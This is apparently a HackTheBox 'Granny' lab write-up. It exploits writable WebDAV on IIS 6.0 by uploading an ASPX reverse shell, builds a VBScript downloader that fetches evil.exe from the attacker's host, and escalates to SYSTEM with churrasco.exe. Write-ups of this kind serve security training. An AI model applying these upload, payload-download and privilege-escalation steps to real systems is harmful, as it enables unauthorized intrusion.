HackTheBox - Granny Writeup

# HackTheBox - Granny Writeup ###### tags: `writeup` `HackTheBox` `Granny` `Easy` `OSCP` `vbs` `JuicyPotato` ## :computer: Port Scanning ```bash # Nmap 7.92 scan initiated Tue Apr 26 06:02:09 2022 as: nmap -sV -T4 -sS -sC -v -p- -oN Ports 10.10.10.15 Nmap scan report for 10.10.10.15 Host is up (0.058s latency). Not shown: 65534 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 6.0 | http-webdav-scan: | WebDAV type: Unknown | Server Date: Tue, 26 Apr 2022 10:03:49 GMT | Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH | Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK |_ Server Type: Microsoft-IIS/6.0 |_http-title: Under Construction |_http-server-header: Microsoft-IIS/6.0 | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT POST |_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Tue Apr 26 06:03:49 2022 -- 1 IP address (1 host up) scanned in 100.30 seconds ``` As we can se the nmap scan a webdav so after look the web we are going to use **cadaver** to enumerate it. ## :eye: Enumeration After bruteforcing directories I discover this: ![](https://i.imgur.com/7uzNlVI.png) To se the components of the web i used **Whatweb** tool: ![](https://i.imgur.com/TIdZRaY.png) After looking how to exploit it i finally try to upload a reverse using the webdav. ## :bomb: Explotation First we enumerate the webdav to see which types of archives extensions accept: ![](https://i.imgur.com/sV4C3T4.png) Now we know that we can upload txt files some rename the shell.aspx to shell.txt and when is uploaded rename it with **cadaver**: ![](https://i.imgur.com/OEOxIwu.png) In the directory that we started cadaver we have to download a aspx reverse shell, I used this changing the port and the ip: https://github.com/borjmz/aspx-reverse-shell/blob/master/shell.aspx As we can see in the next image we can upload using this commands: ```bash upload shell.txt mv shell.txt shell.aspx ``` ![](https://i.imgur.com/koLf8w9.png) Now start a netcat listener and if we load the web page in the explorer we should receive a reverse shell: ![](https://i.imgur.com/fgGLWcd.png) ![](https://i.imgur.com/471fpw4.png) Now we are nt authority\network service and we want the nt authority\system so i'ts time to search how to privesc. ![](https://i.imgur.com/AhYjz6M.png) --- ### ⏫Root Privesc First launch systeminfo to know the version of the machine: ```bash systeminfo systeminfo Host Name: GRANNY OS Name: Microsoft(R) Windows(R) Server 2003, Standard Edition OS Version: 5.2.3790 Service Pack 2 Build 3790 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Server OS Build Type: Uniprocessor Free Registered Owner: HTB Registered Organization: HTB Product ID: 69712-296-0024942-44782 Original Install Date: 4/12/2017, 5:07:40 PM System Up Time: 0 Days, 1 Hours, 12 Minutes, 25 Seconds System Manufacturer: VMware, Inc. System Model: VMware Virtual Platform System Type: X86-based PC Processor(s): 1 Processor(s) Installed. [01]: x86 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz BIOS Version: INTEL - 6040000 Windows Directory: C:\WINDOWS System Directory: C:\WINDOWS\system32 Boot Device: \Device\HarddiskVolume1 System Locale: en-us;English (United States) Input Locale: en-us;English (United States) Time Zone: (GMT+02:00) Athens, Beirut, Istanbul, Minsk Total Physical Memory: 1,023 MB Available Physical Memory: 751 MB Page File: Max Size: 2,470 MB Page File: Available: 2,296 MB Page File: In Use: 174 MB Page File Location(s): C:\pagefile.sys Domain: HTB Logon Server: N/A Hotfix(s): 1 Hotfix(s) Installed. [01]: Q147222 Network Card(s): N/A ``` Next launch a whoami /all to enumerate the privileges: ```bash whoami /all whoami /all USER INFORMATION ---------------- User Name SID ============================ ======== nt authority\network service S-1-5-20 GROUP INFORMATION ----------------- Group Name Type SID Attributes ================================ ================ ============================================== ================================================== NT AUTHORITY\NETWORK SERVICE User S-1-5-20 Mandatory group, Enabled by default, Enabled group Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group GRANNY\IIS_WPG Alias S-1-5-21-1709780765-3897210020-3926566182-1005 Mandatory group, Enabled by default, Enabled group BUILTIN\Performance Log Users Alias S-1-5-32-559 Mandatory group, Enabled by default, Enabled group BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ========================================= ======== SeAuditPrivilege Generate security audits Disabled SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled SeAssignPrimaryTokenPrivilege Replace a process level token Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled ``` Knowing that the server is a windows 2003 and we have SeImpersonatePrivilege Enabled we maybe can privesc using Juicy Potato, but before downloading nothing we are going to build a wget vbs script in the target machine to upload files easily. In the target machine use this commands: >I prefer to do this on C:\Windows\Temp to can write without problems ```bash echo strUrl = WScript.Arguments.Item(0) > wget.vbs echo StrFile = WScript.Arguments.Item(1) >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs echo Err.Clear >> wget.vbs echo Set http = Nothing >> wget.vbs echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs echo http.Open "GET",strURL,False >> wget.vbs echo http.Send >> wget.vbs echo varByteArray = http.ResponseBody >> wget.vbs echo Set http = Nothing >> wget.vbs echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs echo strData = "" >> wget.vbs echo strBuffer = "" >> wget.vbs echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs echo Next >> wget.vbs echo ts.Close >> wget.vbs ``` After executed each command one by one we can download files from http server with this command: ```bash cscript wget.vbs http://10.10.10.10/evil.exe evil.exe ``` ### JuicyPotato We accomplish the prerequisites for JuicyPotato but knowing that the version of the server is older that the normal support for the JuicyPotato exploit we are gonna use a different version called churrasco.exe that we can use on Server 2003 and Windows XP. Here's a complete guide of how to use it [click here.](https://binaryregion.wordpress.com/2021/08/04/privilege-escalation-windows-churrasco-exe/) I downloaded from the previous page the churrasco.exe and upload it using the script. ![](https://i.imgur.com/QulSJgo.png) And to use it only have to execute it followed by the command you want to use in my case I executed a cmd with system privileges and with this I can read all the flags. ![](https://i.imgur.com/Bbwl3fG.png) --- ### You can find me on: :bird:[**Twitter**](https://twitter.com/Aka_Mecanico) :desktop_computer: [**Github**](https://github.com/Mec4nico) :ballot_box_with_check: [**TryHackMe**](https://tryhackme.com/p/mech4nico) :green_book:[**HackTheBox**](https://www.hackthebox.eu/home/users/profile/336092)